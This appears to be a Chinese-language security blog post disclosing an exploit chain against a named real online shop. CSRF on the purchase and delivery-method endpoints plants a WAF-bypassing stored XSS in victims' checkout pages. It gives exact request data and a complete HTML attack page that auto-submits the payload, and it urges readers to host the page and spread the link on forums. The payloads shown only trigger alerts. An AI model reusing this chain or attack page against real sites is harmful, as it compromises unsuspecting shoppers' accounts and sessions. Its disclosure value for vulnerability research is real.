【注意：此文章为博主原创文章！转载需注意，请带原文链接，至少也要是txt格式！】

AO也就是：Akanishi Only

【本博客所有加密的问题都因对方未修复或者未同意公开，所以加密。当然了，如果你真的需要看，可以联系博主，博主可以给你密码。】

我也真是闲的，既然闲来无事，那就帮朋友忙，瞎玩玩。朋友在AO，正巧今天请假看病，看完病能有时间在家闲一会儿，我相信AO不差钱，所以内，，，嘿嘿嘿，，，该咋是咋的，AO东西真心贵，买不起。废话太多直接正题。

这个问题利用方式非常困难，需要多个问题配合才能达到最大化的放大危害！

这里涉及几个问题点：

第一问题点、根源是个储存XSS，但是这个储存XSS有字符限制，总共可以输入53个字符（左右）

第二问题点、AO史密斯商城接入了阿里云WAF。

综合前两个问题点，想用不到53个字符绕过阿里云WAF，，，真心有点难。。。

首先说一下问题点。如下（购物车结算页面，有一个配送方式，此处存在储存XSS）：

http://mall.aosms.com.cn/index.php/cart-checkout-true.html

购物车填写和提交订单信息页面

这个储存XSS也许只能是“自慰”，页面只能是用户购买商品时候去付款的页面，就算我植入XSS也是我自己X我自己，根本影响不到别人。。。问题来了，如何能X别人切别人会访问这里然后中招呢？？？

既然说了需要多个问题配合，咱们开始说说哪些问题点，然后一步一步走到这里。

整体利用思路：首先第一步让用户购买商品，第二步让用户进入上面的购物车付款页面，第三部让用户自动给自己植入储存XSS，第四步访问这个XSS的页面。（整个过程要神不知鬼不觉）

首先，商品购买处存在CSRF：

商品购买CSRF

如果单看这个问题，都容易被忽略不算安全问题，咱们切网下看。

当点击购买的时候，会有一个post数据包，如下：

POST： http://mall.aosms.com.cn/index.php/cart-add-goods.html  
DATA： prepare_type=&btype=is_fastbuy&goods%5Bgoods_id%5D=507&goods%5Bproduct_id%5D=678&product_id=678&goods%5Bnum%5D=1&stock=892&response_json=true

因为这个商城源码的特性，可以把这个POST改为GET类型。好了，咱们攻击的第一步完成了，只要用户访问了咱们构造的链接，就会自主买东西了，第二部，还需要用户进入购物车页面。

http://mall.aosms.com.cn/index.php/cart-checkout-true.html

就这么一个页面，就不用问啦，这也是一个CSRF，呃，，，有点难界定这个算不算CSRF，应该不算？

第三步，修改配送方式。这里也是存在CSRF。当修改的时候会有一个POST数据包。如下：

POST：http://mall.aosms.com.cn/index.php/cart-delivery_confirm.html
DATA：shipping=%257B%2522id%2522%253A7%252C%2522has_cod%2522%253A%2522false%2522%252C%2522dt_name%2522%253A%2522%253Cinput%252Fautofocus%252Fonfocus%253DsetInterval%28URL.slice%28-20%29%29%253E%2522%252C%2522money%2522%253A%25220%2522%257D&isfastbuy=true

上面的数据包就是我构造好的数据包，无攻击性仅仅是测试问题的。因为这个数据包的特性，导致必须重新访问一次也是经过构造的地址，http://mall.aosms.com.cn/index.php/cart-checkout-true.html

好了，废话不多说，下面是演示动图。

ao-xss 攻击示意图

攻击代码，把下方代码保存为html，放入自己的空间，例如博客，然后剩下的只需要你各个论坛，到处宣扬这个URL地址，只要用户访问了，那么他的购物车中就植入了XSS，不但植入了XSS代码，而且还执行了。。。

1
2
3
4
5
6
7
8

<form id="transfer" action="http://mall.aosms.com.cn/index.php/cart-delivery_confirm.html#alert('xs')" method="POST">
<input name="shipping" type="hidden" value="{&quot;id&quot;:7,&quot;has_cod&quot;:&quot;false&quot;,&quot;dt_name&quot;:&quot;&lt;input/autofocus/onfocus=setInterval(URL.slice(-13))&gt;&quot;,&quot;money&quot;:&quot;0&quot;}" /> <input name="isfastbuy" type="hidden" value="true" /></form>
<script type="text/javascript">
function openwin() {  
        window.open("http://mall.aosms.com.cn/index.php/cart-checkout-true.html#alert(111111)", "", "width=500,height=500")  
    }  
setTimeout(openwin(),7000);
</script>